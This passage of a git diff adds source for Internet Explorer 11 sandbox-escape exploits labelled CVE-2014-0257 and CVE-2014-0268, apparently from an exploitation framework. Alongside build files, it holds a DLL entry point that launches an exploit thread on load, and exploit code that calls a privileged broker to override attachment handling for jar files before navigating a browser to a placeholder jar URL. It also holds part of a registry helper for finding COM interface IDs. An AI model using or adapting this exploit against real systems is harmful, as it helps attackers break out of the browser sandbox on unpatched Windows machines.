<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="CVE-2014-0257.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj"> + <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project> + </ProjectReference> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp new file mode 100755 index 0000000000..9eb281e8a8 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp @@ -0,0 +1,23 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +DWORD CALLBACK ExploitThread(LPVOID hModule); + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp new file mode 100755 index 0000000000..11763c77a3 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// CVE-2014-0268.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h new file mode 100755 index 0000000000..562cb0adb0 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h @@ -0,0 +1,11 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <windows.h> +#include <Utils.h> diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h new file mode 100755 index 0000000000..87c0086de7 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp new file mode 100755 index 0000000000..f4be2a5997 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp @@ -0,0 +1,81 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" +#include <Utils.h> +#include <Shlwapi.h> +#include <Exdisp.h> + +_COM_SMARTPTR_TYPEDEF(IWebBrowser2, __uuidof(IWebBrowser2)); + +void DoSetAttachmentUserOverride() +{ + IShdocvwBroker* shdocvw = nullptr; + + try + { + HRESULT ret; + shdocvw = CreateSHDocVw(); + + CLSID clsid; + + CLSIDFromString(L"{0002DF01-0000-0000-C000-000000000046}", &clsid); + + IWebBrowser2Ptr browser; + + ret = CoCreateInstance(clsid, nullptr, CLSCTX_SERVER, IID_PPV_ARGS(&browser)); + if (FAILED(ret)) + { + DebugPrintf("CoCreateInstance: %08X", ret); + throw new _com_error(ret); + } + + DebugPrintf("browser: %p", browser); + + unsigned char buf[1] = { 0 }; + + ret = shdocvw->SetAttachmentUserOverride(L"jarfile"); + if (FAILED(ret)) + { + DebugPrintf("Failed to set attachement user override\n"); + throw new _com_error(ret); + } + + bstr_t nav = L"http://www.dummy.local/testapp.jar"; + + DebugPrintf("Navigate: %08X", browser->Navigate(nav, nullptr, nullptr, nullptr, nullptr)); + } + catch (_com_error e) + { + DebugPrintf("Error during processing: %ls\n", e.ErrorMessage()); + } + + if (shdocvw) + { + shdocvw->Release(); + shdocvw = nullptr; + } +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + CoInitialize(nullptr); + DoSetAttachmentUserOverride(); + CoUninitialize(); + + FreeLibraryAndExitThread((HMODULE)hModule, 0); + + return 0; +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj new file mode 100755 index 0000000000..ae208e17c4 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj @@ -0,0 +1,183 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CVE20140268</RootNamespace> + <ProjectName>CVE-2014-0268</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="CVE-2014-0268.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj"> + <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project> + </ProjectReference> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp new file mode 100755 index 0000000000..042cf2c7c4 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp @@ -0,0 +1,23 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +DWORD CALLBACK ExploitThread(LPVOID hModule); + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp new file mode 100755 index 0000000000..11763c77a3 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// CVE-2014-0268.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h new file mode 100755 index 0000000000..562cb0adb0 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h @@ -0,0 +1,11 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <windows.h> +#include <Utils.h> diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h new file mode 100755 index 0000000000..87c0086de7 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj b/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj new file mode 100755 index 0000000000..2e2b9ea000 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj @@ -0,0 +1,154 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CommandUtils</RootNamespace> + <ProjectName>CommonUtils</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup /> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="regln.h" /> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + <ClInclude Include="Utils.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="regln.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + <ClCompile Include="Utils.cpp" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp new file mode 100755 index 0000000000..dbc6eeeb92 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp @@ -0,0 +1,373 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" + +#include "Utils.h" + +#include <strsafe.h> +#include <sddl.h> +#include <Shlwapi.h> + +#pragma comment(lib, "shlwapi.lib") + +static BOOL g_hasShDocIID; +static IID g_shDocIID; + +BOOL GetIIDForName(LPCWSTR lpName, IID* riid) +{ + HKEY hRoot = nullptr; + ULONG status; + + status = RegOpenKeyEx(HKEY_CLASSES_ROOT, L"Interface", 0, KEY_ENUMERATE_SUB_KEYS, &hRoot); + if (status == 0) + { + WCHAR keyName[128]; + DWORD index = 0; + BOOL foundKey = FALSE; + + while (true) + { + HKEY hSubKey; + + status = RegEnumKeyW(hRoot, index, keyName, _countof(keyName)); + if (status != 0) + { + break; + } + + index++; + + status = RegOpenKeyEx(hRoot, keyName, 0, KEY_QUERY_VALUE, &hSubKey); + if (status != 0) + { + continue; + } + + DWORD dwType; + WCHAR valueName[256]; + DWORD dwSize = sizeof(valueName)-sizeof(WCHAR); + + status = RegQueryValueEx(hSubKey, nullptr, nullptr, &dwType, (BYTE*)valueName, &dwSize); + RegCloseKey(hSubKey); + + if ((status != 0) || (dwType != REG_SZ)) + { + continue; + } + + // Ensure NUL terminate + valueName[dwSize / sizeof(WCHAR)] = 0; + + if (_wcsicmp(valueName, lpName) == 0) + { + foundKey = TRUE; + break; + } + } + + RegCloseKey(hRoot); + + if (foundKey) + { + return SUCCEEDED(IIDFromString(keyName, riid)); + } + } + else + { + DebugPrintf("Could not open Interface key %d\n", status); + } + + return FALSE; +} + +REFIID GetSHDocIID() 